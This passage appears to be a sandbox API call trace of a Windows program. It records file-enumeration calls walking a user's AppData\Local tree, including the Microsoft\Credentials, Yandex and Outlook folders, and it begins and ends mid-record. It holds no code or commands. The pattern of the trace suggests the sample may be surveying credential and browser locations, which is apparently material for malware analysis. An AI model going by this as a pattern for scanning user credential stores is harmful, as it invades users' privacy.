ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.508] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.508] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="STARTUP", cAlternateFileName="")) returned 1 [0281.509] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="STARTUP", cAlternateFileName="")) returned 0 [0281.509] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.509] CoTaskMemAlloc (cb=0x20c) returned 0x572efd8 [0281.509] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x572efd8 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0281.509] CoTaskMemFree (pv=0x572efd8) [0281.509] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x43e56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local", lpFilePart=0x0) returned 0x20 [0281.510] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea64) returned 1 [0281.510] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x43e544, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local", lpFilePart=0x0) returned 0x20 [0281.511] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\*", lpFindFileData=0x43e814 | out: lpFindFileData=0x43e814*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe39b9920, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xe39b9920, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.511] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe39b9920, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xe39b9920, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.511] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0281.511] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79dbc710, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79dbc710, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79dbc710, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0281.512] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x79ba73d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ba73d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xc63243a0, ftLastWriteTime.dwHighDateTime=0x1d7e780, nFileSizeHigh=0x0, nFileSizeLow=0x11eca5, dwReserved0=0x0, dwReserved1=0x0, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0281.512] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0281.512] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xfaf71720, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xfaf71720, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0281.512] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79dbc710, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79dbc710, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79dbc710, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0281.512] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7b85dd30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7b85dd30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7b85dd30, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0281.513] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe39b9920, ftCreationTime.dwHighDateTime=0x1d80713, ftLastAccessTime.dwLowDateTime=0xe39b9920, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xe39b9920, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Yandex", cAlternateFileName="")) returned 1 [0281.513] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.513] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7d4) returned 1 [0281.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea34) returned 1 [0281.514] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Application Data", nBufferLength=0x105, lpBuffer=0x43e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Application Data", lpFilePart=0x0) returned 0x31 [0281.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea54) returned 1 [0281.514] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Application Data", nBufferLength=0x105, lpBuffer=0x43e534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Application Data", lpFilePart=0x0) returned 0x31 [0281.514] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Application Data\\*", lpFindFileData=0x43e804 | out: lpFindFileData=0x43e804*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c4) returned 1 [0281.518] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\History", nBufferLength=0x105, lpBuffer=0x43e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\History", lpFilePart=0x0) returned 0x28 [0281.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea54) returned 1 [0281.519] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\History", nBufferLength=0x105, lpBuffer=0x43e534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\History", lpFilePart=0x0) returned 0x28 [0281.519] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\History\\*", lpFindFileData=0x43e804 | out: lpFindFileData=0x43e804*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c4) returned 1 [0281.522] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", nBufferLength=0x105, lpBuffer=0x43e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", lpFilePart=0x0) returned 0x2a [0281.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea54) returned 1 [0281.522] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", nBufferLength=0x105, lpBuffer=0x43e534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", lpFilePart=0x0) returned 0x2a [0281.523] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\*", lpFindFileData=0x43e804 | out: lpFindFileData=0x43e804*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.523] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.523] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798876f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0281.523] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bcd530, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Feeds", cAlternateFileName="")) returned 1 [0281.524] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfea09ee5, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Feeds Cache", cAlternateFileName="FEEDSC~1")) returned 1 [0281.524] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2cedac90, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FORMS", cAlternateFileName="")) returned 1 [0281.524] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7983b430, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x519a8410, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x519a8410, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0281.524] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798152d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xcba84960, ftLastAccessTime.dwHighDateTime=0x1d706b2, ftLastWriteTime.dwLowDateTime=0xcba84960, ftLastWriteTime.dwHighDateTime=0x1d706b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0281.524] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x14ff8dd0, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x5bb5ba10, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x5bb5ba10, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0281.524] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8a7c4d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf26feb50, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf26feb50, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0281.525] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ce8e9d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x23884f50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x23884f50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0281.525] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0281.525] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8cddad0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xe8d03c30, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xe8d03c30, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~4")) returned 1 [0281.525] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7d4ee530, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7d4ee530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~3")) returned 1 [0281.525] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf7de167e, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media", cAlternateFileName="WINDOW~2")) returned 1 [0281.526] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 1 [0281.526] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 0 [0281.526] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.526] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c4) returned 1 [0281.526] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea24) returned 1 [0281.526] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9d0) returned 1 [0281.527] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", nBufferLength=0x105, lpBuffer=0x43e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft", lpFilePart=0x0) returned 0x2a [0281.527] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\*", lpFindFileData=0x43e780 | out: lpFindFileData=0x43e780*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.527] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.527] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798876f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0281.528] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798876f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bcd530, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xff0498b1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Feeds", cAlternateFileName="")) returned 1 [0281.528] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79861590, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b81270, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfea09ee5, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Feeds Cache", cAlternateFileName="FEEDSC~1")) returned 1 [0281.528] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2cedac90, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2cedac90, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2cedac90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FORMS", cAlternateFileName="")) returned 1 [0281.528] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7983b430, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x519a8410, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x519a8410, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0281.529] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798152d0, ftCreationTime.dwHighDateTime=0x1d70509, 